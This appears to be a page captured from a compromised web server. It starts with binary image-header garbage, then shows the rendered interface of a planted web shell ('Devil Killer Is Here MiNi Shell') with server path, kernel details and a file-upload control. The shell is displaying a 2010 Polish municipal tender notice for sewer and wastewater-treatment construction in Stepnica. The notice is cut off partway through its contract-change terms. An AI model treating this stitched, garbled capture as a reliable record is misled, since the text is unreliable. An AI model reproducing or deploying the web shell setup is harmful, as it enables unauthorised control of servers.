JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/105729-N-2010.html

<p class="kh_header"><b>Stepnica: 1. Budowa kanalizacji sanitarnej wraz z przyłączami do budynków, przepompowniami ścieków, lokalną oczyszczalnią ścieków                        i przyłączem wodociągowym w miejscowości Widzieńsko, Gmina Stepnica, 
2. Budowa kanalizacji sanitarnej wraz z przyłączami do budynków, przepompownią i lokalną oczyszczalnią ścieków w miejscowości Budzień, Gmina Stepnica</b><br>
<b>Numer ogłoszenia: 105729 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stepnica , ul. Kościuszki 4, 72-112 Stepnica, woj. zachodniopomorskie, tel. 091 4188521, faks 091 4188580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stepnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Budowa kanalizacji sanitarnej wraz z przyłączami do budynków, przepompowniami ścieków, lokalną oczyszczalnią ścieków                        i przyłączem wodociągowym w miejscowości Widzieńsko, Gmina Stepnica, 
2. Budowa kanalizacji sanitarnej wraz z przyłączami do budynków, przepompownią i lokalną oczyszczalnią ścieków w miejscowości Budzień, Gmina Stepnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Planowana inwestycja obejmuje: 
1. Budowę kanalizacji sanitarnej wraz z przyłączami do budynków, przepompowniami ścieków, lokalną oczyszczalnią ścieków i przyłączem wodociągowym w miejscowości Widzieńsko, Gmina Stepnica, 
2. Budowę kanalizacji sanitarnej wraz z przyłączami do budynków, przepompownią i lokalną oczyszczalnią ścieków w miejscowości Budzień, Gmina Stepnica


3.3. Zakres:
BUDZIEŃ
1) Roboty rozbiórkowe i odtworzeniowe oraz związane z budową nawierzchni 
a) rozebranie nawierzchni z płyt jumbo- 30,50 m2,
b) wywiezienie gruzu -0,61 m3,
c) nawierzchnia z płyt jumbo- odtworzenie (przy założonej stracie materiału 10 %),
2. Roboty ziemne
a) roboty pomiarowe przy liniowych robotach ziemnych -trasa rurociągu w terenie- 1.423 km,
b) wykopy oraz przekopy  o głębokości do 3,0 m -2530,625 m3,
c) wykopy oraz przekopy  o głębokości do 4,0 m -114,278 m3,
d) wykopy liniowe o szerokości 0,8- 2,5 m - 553,442 m3,
e) ażurowe umocnienie ścian wykopów wraz z rozbiórką palami szalunkowymi stalowymi -3230,960 m2,
f) pełne umocnienie ścian wykopów wraz z rozbiórką palami szalunkowymi stalowymi - 40,240 m2,
g) podłoża pod kanały i obiekty z materiałów sypkich grub. 20 cm- 254,660 m3,
h) obsypka rur piaskiem- 183,951 m3,
i) nadsypka -wykonanie i  zagęszczenie mechaniczne warstwy 1272,700 m2,
j) zasypanie wykopów -2006,777 m3,
k) zasypanie wykopów o ścianach pionowych- 418,444 m3,
l) zagęszczenie nasypów z gruntu spoistego 38,181 m3,
ł) roboty ziemne wykonywane koparkami- 825,563 m3,
m) mechaniczne roboty ziemne- 773,124 m3,
n) pompowanie wody- 50 godz.,
 3. Roboty przeciskowe
a) wykonanie przecisków- 6 m,
b) uszczelnianie końców rur ochronnych - 2 szt.,
4. Roboty sieciowe
a) studnie betonowe typu BS 1200 mm- 8 stud.,
b) studnie rewizyjne z kręgów betonowych w gotowym wykopie - 8 podst.,
c) studnia rozprężna typu BS o śr. 1000 mm- 1 stud.,
d) studzienki kanalizacyjne- niewłazowe o śr. 400 mm-36 szt.,
e) kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm- 694,3 m,
f) kanały z rur PVC łączonych na wcisk o śr. zewn. 1600 mm- 449,0  m,
g) kształtki PVC kanalizacyjne jednokielichowe łączone na wcisk o śr. zewn. 200 mm- 9 szt.,
h) podłączenie z rur polietylenowych ciśnieniowych 160 mm- 1 złącz.,
i) podłączenie z rur polietylenowych ciśnieniowych 110 mm- 1 złącz.,
j) podłączenie z rur polietylenowych ciśnieniowych 90 mm- 1 złącz.,
k) montaż rurociągów z rur polietylenowych 160 mm- 1,500 m,
l) montaż rurociągów z rur polietylenowych 90 mm- 278,500  m,
ł) oznakowanie trasy rurociągu- 1143,300 m,
5. Roboty montażowe 
a) przepompownia ścieków- 1 kpl.,
b) oczyszczalnia ścieków- 1 kpl.,
c) ogrodzenie z siat kina słupkach- 163,200 m2,
d) nawierzchnia z polbruku- 79,00 m2

WIDZIEŃSKO 
1. Roboty ziemne 
a) roboty pomiarowe - 1,877 km,
b) wykopy oraz przekopy do 3,0 m- 1986,060 m3,
c) wykopy liniowe o szerokości 0,8-2,5 m- 1986,060 m3,
d) ażurowe umocnienie ścian- 1986,060 m2,
e) podłoża pod kanały i obiekty z materiałów sypkich grub. 20 cm- 283,648 m3,
f) osypka rur z piaskiem- 209,522 m3,
g) dodatkowa osypka izolacyjna- 13,600 m3,
h) nadyspka- 1418,240 m2,
i) zasypanie wykopów- 1507,911 m3,
j) zasypanie wykopów- 1507,911  m3,
k) zagęszczenie nasypów- 42,547 m3,
l) roboty ziemne- 920,920 m3,
ł) dodatek za każdy rozpoczęty 1 km transportu- 924,270 m3,
m) odspojenie gruntu i przewóz- 924,270 m3,
n) ręczne roboty ziemne- 956,300 m3,
o) dodatek za każdy rozpoczęty 1 km transportu- 956,300 m3,

2. Roboty przeciskowe
a) wykonanie przecisków 315 PVC- 17 m,
b) wykonanie przecisków 250 PVC- 46,500 m,
c) wykonanie przewiertów sterowanych de 160 PE- 60 m,
d) wykonanie przewiertów sterowanych de 200 PE- 235,00 m,
3. Roboty sieciowe
a) kanały z rur PVC 200 mm- 849,00 m,
b) kanały z rur PVC 160 mm- 557,300 m,
c) studnie z kręgów betonowych1200 mm - 23,00 stud.,
d) studnie rewizyjne -23,00 podst.,
e) studzienki kanalizacyjne- 400 mm- 6 szt.,
f) studzienki kanalizacyjne- 315 mm- 49 szt.,
g) kształtki PVC kanalizacyjne -5 szt.,
h) oznakowanie trasy - 1904,00 m,
i) sieci kanalizacyjne 90 mm- 232,500 m,
j) sieci kanalizacyjne 160mm- 3,00 m,
k) zabezpieczenie kabla w ziemi- 3,00 kpl.,
l) hydranty pożarowe 80 mm- 1 kpl.,
ł) zasuwy E2 -2 kpl.,
m) oznakowanie trasy gazociągu na murze- tabliczki- 2 kpl.
n) sieci wodociągowe -montaż kształtek ciśnieniowych- 2 szt.,
o) sieci wodociągowe- kształtki żeliwne- 2 szt.,
p) sieci wodociągowe- kształtki żeliwne- 1 szt.,
r) sieci wodociągowe- połączenie rur 160 mm- 2 złącz.,
s) sieci wodociągowe połączenia rur- 110 mm 2 złącz.,
t) sieci wodociągowe połączenia rur 90 mm- 2 złącz.,
u) sieci wodociągowe połączenia rur 90 mm- 3 złącz.,
w) sieci wodociągowe połączenia rur 90 mm- 1 złącz.,
y) sieci wodociągowe -montaż rurociągów- 27 m,
4. Roboty rozbiórkowe
a) cięci nawierzchni z mas mineralno- asfaltowych na gł. 5 cm- 237,100 m,
b) cięci nawierzchni z mas mineralno- asfaltowych za każdy dalszy 1 cm- 237,100 m,
c) mechaniczne rozebranie podbudowy- 237,100 m2,
d) mechaniczne rozebranie podbudowy- dalszy 1 cm- 237,100 m2,
e) nawierzchnia z mieszanek mineralno- bitumicznych, warstwa wiążąca grub. Po zagęszczeniu 4 cm- 237,100 m2,
f) nawierzchnia z mieszanek mineralno- bitumicznych grysowych , warstwa wiążąca  1 cm grub. po zagęszczen. - 237,100 m2,
g) nawierzchnia z mieszanek mineralno- bitumicznych grysowych , warstwa ścieralna 1 cm grub. po zagęszczen. - 237,100 m2,
h) wywiezienie gruzu- 23,710 m3,
5. Roboty montażowe 
a) przepompownia ścieków -2 kpl.,
b) oczyszczalnia ścieków- 1 kpl.,
c) ogrodzenie z siatki- 292,800 m2,
d) nawierzchnia z polbruku- 384,00 m2

Dodatkowe informacje:
BUDZIEŃ
-Projekt organizacji ruchu zaopiniować w Wydziale Dróg Powiatowych i uzgodnić                  z Komendą Powiatową Policji,
- uzyskać decyzję zezwalająca na zajęcie pasa drogowego- opłaty ponosi Wykonawca, 
WIDZIEŃSKO
- przed przystąpieniem do realizacji należy uzyskać decyzję zezwalającą na zajęcie pasa drogowego -opłaty ponosi Wykonawca, 
-Projekt organizacji ruchu zaopiniować w Wydziale Dróg Powiatowych i uzgodnić                  z Komendą Powiatową Policji,

3.4. Szczegółowy przedmiot zamówienia określają następujące załączniki:
1. decyzja pozwolenie na budowę -Budzień - załącznik nr 1 do SIWZ,
2. projekt budowlany Budzień- załącznik nr 2 do SIWZ,
3.operat wodno- prawny i decyzja Budzień- załącznik nr 3 do SIWZ,
4. STWIOR Budzień- załącznik nr 4 do SIWZ,
5. przedmiar Budzień- załącznik nr 5 do SIWZ,
6. decyzja pozwolenia na budowę Widzieńsko- załącznik nr 6 do SIWZ,
7. projekt budowlany Widzieńsko- załącznik nr 7 do SIWZ,
8. pozwolenie wodno- prawne i decyzja Widzieńsko - załącznik nr 8 do SIWZ,
9.  pozwolenie wodno- prawne i decyzja Widzieńsko - załącznik nr 9 do SIWZ,
10. STWIOR Widzieńsko- załącznik nr 10 do SIWZ,
11. przedmiar Widzieńsko- załącznik nr 11 do SIWZ,

3.5. Inwentaryzacja geodezyjna powykonawcza po stronie Wykonawcy.  

Dodatkowo do wyceny należy uwzględnić system wizualizacji i monitoringu oczyszczalni ścieków w Budzieniu i Widzieńsku.
Zakres: 
Nowo budowane oczyszczalnie mają być objęte rozbudową istniejącego systemu wizualizacji i monitoringu (Ecol-Unicon) w oparciu o pakietową transmisję danych , który jest zainstalowany i funkcjonuje na terenie Gminy Stepnica. 
System monitoringu w technologii GPRS przekazuje następujące dane do centralnej dyspozytorni:
-stany pracy urządzeń technologicznych (dmuchaw, wentylatorów, dozownika Pix),
-stany awarii urządzeń technologicznych (dmuchaw, wentylatorów, dozownika Pix),
-otwarcie szafy sterowniczej,
-otwarcie komory instalacyjnej,
-temperaturę powietrza w komorze instalacyjnej,
-stan zasilania elektrycznego,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.10-9, 45.11.12.00-0, 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8.1. Zamawiający żąda wniesienia wadium w kwocie 60.000,00 zł 
Wadium wnosi się przed upływem terminu składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu, na rachunek bankowy PKO O/GOLENIÓW  65 1020 4812 0000 0502 0007 7420, 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie z kasy jest zawsze poręczeniem pieniężnym, 
c)	gwarancjach bankowych, 
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275),</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z zapisami SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>14.10. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.

14.10.1. Zmiana terminu realizacji przedmiotu umowy 

1. Zmiany spowodowane warunkami atmosferycznymi, w szczególności:
a)	klęski żywiołowe,
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów.

2. Zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi,  w szczególności:
a)	niewypały i niewybuchy,
b)	wykopaliska archeologiczne nie przewidywane w SIWZ,
c)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka, itp.),
d)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych.

3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,                     w szczególności:
a)	wstrzymanie robót przez Zamawiającego,
b)	konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji projektowej.

4.	Zmiany będące następstwem działania organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.,
b)	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej.

5. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy  skutkujące niemożliwością prowadzenia prac.

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 - 5 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 

14.10.2. Zmiana sposobu spełnienia świadczenia:
1. Zmiany technologiczne, w szczególności:
a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
